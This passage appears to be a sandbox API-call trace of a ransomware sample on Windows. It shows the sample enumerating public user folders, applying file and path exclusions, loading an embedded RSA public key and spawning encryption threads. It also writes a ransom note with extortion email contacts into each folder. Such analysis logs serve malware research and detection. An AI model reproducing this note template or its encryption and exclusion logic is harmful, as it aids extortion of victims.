[0145.531] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 0 [0145.531] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0145.531] lstrcmpW (lpString1="Recorded TV", lpString2="..") returned 1 [0145.531] lstrcmpW (lpString1="Recorded TV", lpString2=".") returned 1 [0145.531] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Public" | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public" [0145.531] lstrcatW (in: lpString1="C:\\Users\\Public", lpString2="\\" | out: lpString1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0145.531] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Recorded TV" | out: lpString1="C:\\Users\\Public\\Recorded TV") returned="C:\\Users\\Public\\Recorded TV" [0145.531] SetErrorMode (uMode=0x1) returned 0x1 [0145.531] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Recorded TV" | out: lpString1="C:\\Users\\Public\\Recorded TV") returned="C:\\Users\\Public\\Recorded TV" [0145.531] lstrcatW (in: lpString1="C:\\Users\\Public\\Recorded TV", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Recorded TV\\") returned="C:\\Users\\Public\\Recorded TV\\" [0145.531] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Public\\Recorded TV\\" | out: lpString1="C:\\Users\\Public\\Recorded TV\\") returned="C:\\Users\\Public\\Recorded TV\\" [0145.531] lstrcatW (in: lpString1="C:\\Users\\Public\\Recorded TV\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\Recorded TV\\*.*") returned="C:\\Users\\Public\\Recorded TV\\*.*" [0145.531] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3d11398 [0145.531] PathFindFileNameW (pszPath="C:\\Users\\Public\\Recorded TV") returned="Recorded TV" [0145.532] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Recorded TV" | out: lpString1="Recorded TV") returned="Recorded TV" [0145.532] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0145.532] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0145.532] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0145.532] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0145.532] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0145.532] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0145.532] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0145.532] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0145.532] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0145.532] StrStrW (lpFirst="C:\\Users\\Public\\Recorded TV\\", lpSrch="Desktop") returned 0x0 [0145.532] StrStrW (lpFirst="C:\\Users\\Public\\Recorded TV\\", lpSrch="DESKTOP") returned 0x0 [0145.532] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Recorded TV\\") returned 32 [0145.532] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0145.532] lstrcpyW (in: lpString1=0x17cf1c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0145.532] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Public\\Recorded TV\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\") returned="\\\\?\\C:\\Users\\Public\\Recorded TV\\" [0145.532] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8e0 [0145.533] Sleep (dwMilliseconds=0x96) [0145.757] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0145.757] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0145.757] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 1 [0145.757] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 0 [0145.758] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Recorded TV" | out: lpString1="C:\\Users\\Public\\Recorded TV") returned="C:\\Users\\Public\\Recorded TV" [0145.758] lstrcatW (in: lpString1="C:\\Users\\Public\\Recorded TV", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\Recorded TV\\*.*") returned="C:\\Users\\Public\\Recorded TV\\*.*" [0145.758] StrStrW (lpFirst="C:\\Users\\Public\\Recorded TV\\", lpSrch="Desktop") returned 0x0 [0145.758] StrStrW (lpFirst="C:\\Users\\Public\\Recorded TV\\", lpSrch="DESKTOP") returned 0x0 [0145.758] SetErrorMode (uMode=0x1) returned 0x1 [0145.758] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Public\\Recorded TV\\_HELP_INSTRUCTION.TXT") returned 49 [0145.758] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0145.758] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0145.758] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x8e8) returned 0x0 [0145.758] RegQueryValueExW (in: hKey=0x8e8, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x4374598, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x4374598*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0145.758] RegCloseKey (hKey=0x8e8) returned 0x0 [0145.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0145.758] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0145.759] CreateFileW (lpFileName="C:\\Users\\Public\\Recorded TV\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\recorded tv\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0145.759] CreateFileW (lpFileName="C:\\Users\\Public\\Recorded TV\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\recorded tv\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8e8 [0145.759] WriteFile (in: hFile=0x8e8, lpBuffer=0x17a4dc*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x17a4d4, lpOverlapped=0x0 | out: lpBuffer=0x17a4dc*, lpNumberOfBytesWritten=0x17a4d4*=0x2c4, lpOverlapped=0x0) returned 1 [0145.760] CloseHandle (hObject=0x8e8) returned 1 [0145.760] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3d11398 [0145.760] PathFindFileNameW (pszPath="C:\\Users\\Public\\Recorded TV") returned="Recorded TV" [0145.760] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Recorded TV" | out: lpString1="Recorded TV") returned="Recorded TV" [0145.760] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0145.760] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0145.760] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0145.760] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0145.760] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0145.760] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0145.760] lstrcmpW (lpString1="Sample Media", lpString2="..") returned 1 [0145.760] lstrcmpW (lpString1="Sample Media", lpString2=".") returned 1 [0145.760] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\Public\\Recorded TV" | out: lpString1="C:\\Users\\Public\\Recorded TV") returned="C:\\Users\\Public\\Recorded TV" [0145.760] lstrcatW (in: lpString1="C:\\Users\\Public\\Recorded TV", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Recorded TV\\") returned="C:\\Users\\Public\\Recorded TV\\" [0145.760] lstrcatW (in: lpString1="C:\\Users\\Public\\Recorded TV\\", lpString2="Sample Media" | out: lpString1="C:\\Users\\Public\\Recorded TV\\Sample Media") returned="C:\\Users\\Public\\Recorded TV\\Sample Media" [0145.761] SetErrorMode (uMode=0x1) returned 0x1 [0145.761] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Recorded TV\\Sample Media" | out: lpString1="C:\\Users\\Public\\Recorded TV\\Sample Media") returned="C:\\Users\\Public\\Recorded TV\\Sample Media" [0145.761] lstrcatW (in: lpString1="C:\\Users\\Public\\Recorded TV\\Sample Media", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Recorded TV\\Sample Media\\") returned="C:\\Users\\Public\\Recorded TV\\Sample Media\\" [0145.761] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Public\\Recorded TV\\Sample Media\\" | out: lpString1="C:\\Users\\Public\\Recorded TV\\Sample Media\\") returned="C:\\Users\\Public\\Recorded TV\\Sample Media\\" [0145.761] lstrcatW (in: lpString1="C:\\Users\\Public\\Recorded TV\\Sample Media\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\Recorded TV\\Sample Media\\*.*") returned="C:\\Users\\Public\\Recorded TV\\Sample Media\\*.*" [0145.761] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3d11dd8 [0145.761] PathFindFileNameW (pszPath="C:\\Users\\Public\\Recorded TV\\Sample Media") returned="Sample Media" [0145.761] lstrcpyW (in: lpString1=0x17b644, lpString2="Sample Media" | out: lpString1="Sample Media") returned="Sample Media" [0145.761] FindNextFileW (in: hFindFile=0x3d11dd8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0145.761] FindNextFileW (in: hFindFile=0x3d11dd8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0145.761] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0145.761] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0145.761] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0145.761] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0145.761] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0145.761] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0145.761] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0145.761] StrStrW (lpFirst="C:\\Users\\Public\\Recorded TV\\Sample Media\\", lpSrch="Desktop") returned 0x0 [0145.761] StrStrW (lpFirst="C:\\Users\\Public\\Recorded TV\\Sample Media\\", lpSrch="DESKTOP") returned 0x0 [0145.761] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\") returned 45 [0145.761] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0145.761] lstrcpyW (in: lpString1=0x17be7c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0145.761] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\") returned="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\" [0145.761] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8f8 [0145.762] Sleep (dwMilliseconds=0x96) [0145.959] FindNextFileW (in: hFindFile=0x3d11dd8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0145.960] lstrcmpW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="..") returned 1 [0145.960] lstrcmpW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2=".") returned 1 [0145.960] StrStrW (lpFirst="win7_scenic-demoshort_raw.wtv", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0145.960] StrStrW (lpFirst="win7_scenic-demoshort_raw.wtv", lpSrch="ntldr") returned 0x0 [0145.960] StrStrW (lpFirst="win7_scenic-demoshort_raw.wtv", lpSrch="NTLDR") returned 0x0 [0145.960] StrStrW (lpFirst="win7_scenic-demoshort_raw.wtv", lpSrch="NTDETECT.COM") returned 0x0 [0145.960] StrStrW (lpFirst="win7_scenic-demoshort_raw.wtv", lpSrch="ntdetect.com") returned 0x0 [0145.960] StrStrW (lpFirst="C:\\Users\\Public\\Recorded TV\\Sample Media\\", lpSrch="Desktop") returned 0x0 [0145.960] StrStrW (lpFirst="C:\\Users\\Public\\Recorded TV\\Sample Media\\", lpSrch="DESKTOP") returned 0x0 [0145.960] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\") returned 45 [0145.960] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0145.960] lstrcpyW (in: lpString1=0x17be7c, lpString2="win7_scenic-demoshort_raw.wtv" | out: lpString1="win7_scenic-demoshort_raw.wtv") returned="win7_scenic-demoshort_raw.wtv" [0145.960] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\") returned="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\" [0145.960] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8c8 [0145.960] Sleep (dwMilliseconds=0x96) [0146.240] FindNextFileW (in: hFindFile=0x3d11dd8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0146.240] FindClose (in: hFindFile=0x3d11dd8 | out: hFindFile=0x3d11dd8) returned 1 [0146.240] FindClose (in: hFindFile=0x3d11dd8 | out: hFindFile=0x3d11dd8) returned 0 [0146.240] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Recorded TV\\Sample Media" | out: lpString1="C:\\Users\\Public\\Recorded TV\\Sample Media") returned="C:\\Users\\Public\\Recorded TV\\Sample Media" [0146.240] lstrcatW (in: lpString1="C:\\Users\\Public\\Recorded TV\\Sample Media", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\Recorded TV\\Sample Media\\*.*") returned="C:\\Users\\Public\\Recorded TV\\Sample Media\\*.*" [0146.240] StrStrW (lpFirst="C:\\Users\\Public\\Recorded TV\\Sample Media\\", lpSrch="Desktop") returned 0x0 [0146.240] StrStrW (lpFirst="C:\\Users\\Public\\Recorded TV\\Sample Media\\", lpSrch="DESKTOP") returned 0x0 [0146.240] SetErrorMode (uMode=0x1) returned 0x1 [0146.240] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Public\\Recorded TV\\Sample Media\\_HELP_INSTRUCTION.TXT") returned 62 [0146.240] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0146.240] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0146.240] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x904) returned 0x0 [0146.240] RegQueryValueExW (in: hKey=0x904, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43747c8, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x43747c8*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0146.240] RegCloseKey (hKey=0x904) returned 0x0 [0146.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0146.241] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0146.241] CreateFileW (lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\recorded tv\\sample media\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.241] CreateFileW (lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\recorded tv\\sample media\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0146.350] WriteFile (in: hFile=0x130, lpBuffer=0x17943c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x179434, lpOverlapped=0x0 | out: lpBuffer=0x17943c*, lpNumberOfBytesWritten=0x179434*=0x2c4, lpOverlapped=0x0) returned 1 [0146.351] CloseHandle (hObject=0x130) returned 1 [0146.351] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x4371ff8 [0146.352] PathFindFileNameW (pszPath="C:\\Users\\Public\\Recorded TV\\Sample Media") returned="Sample Media" [0146.352] lstrcpyW (in: lpString1=0x17b644, lpString2="Sample Media" | out: lpString1="Sample Media") returned="Sample Media" [0146.352] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0146.352] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0146.352] FindNextFileW (in: hFindFile=0x4371ff8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0146.352] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0146.352] FindNextFileW (in: hFindFile=0x4371ff8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0146.352] FindNextFileW (in: hFindFile=0x4371ff8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0146.352] FindNextFileW (in: hFindFile=0x4371ff8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0146.352] FindNextFileW (in: hFindFile=0x4371ff8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0146.352] FindNextFileW (in: hFindFile=0x4371ff8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0146.352] FindClose (in: hFindFile=0x4371ff8 | out: hFindFile=0x4371ff8) returned 1 [0146.352] FindClose (in: hFindFile=0x4371ff8 | out: hFindFile=0x4371ff8) returned 0 [0146.352] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0146.352] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0146.352] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 1 [0146.352] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 0 [0146.353] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0146.353] lstrcmpW (lpString1="Videos", lpString2="..") returned 1 [0146.353] lstrcmpW (lpString1="Videos", lpString2=".") returned 1 [0146.353] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Public" | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public" [0146.353] lstrcatW (in: lpString1="C:\\Users\\Public", lpString2="\\" | out: lpString1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0146.353] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Videos" | out: lpString1="C:\\Users\\Public\\Videos") returned="C:\\Users\\Public\\Videos" [0146.353] SetErrorMode (uMode=0x1) returned 0x1 [0146.353] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Videos" | out: lpString1="C:\\Users\\Public\\Videos") returned="C:\\Users\\Public\\Videos" [0146.353] lstrcatW (in: lpString1="C:\\Users\\Public\\Videos", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Videos\\") returned="C:\\Users\\Public\\Videos\\" [0146.353] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Public\\Videos\\" | out: lpString1="C:\\Users\\Public\\Videos\\") returned="C:\\Users\\Public\\Videos\\" [0146.353] lstrcatW (in: lpString1="C:\\Users\\Public\\Videos\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\Videos\\*.*") returned="C:\\Users\\Public\\Videos\\*.*" [0146.353] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Videos\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3d11398 [0146.353] PathFindFileNameW (pszPath="C:\\Users\\Public\\Videos") returned="Videos" [0146.353] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Videos" | out: lpString1="Videos") returned="Videos" [0146.353] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0146.354] FindNextFileW (in: hFindFile=0x3d11398, 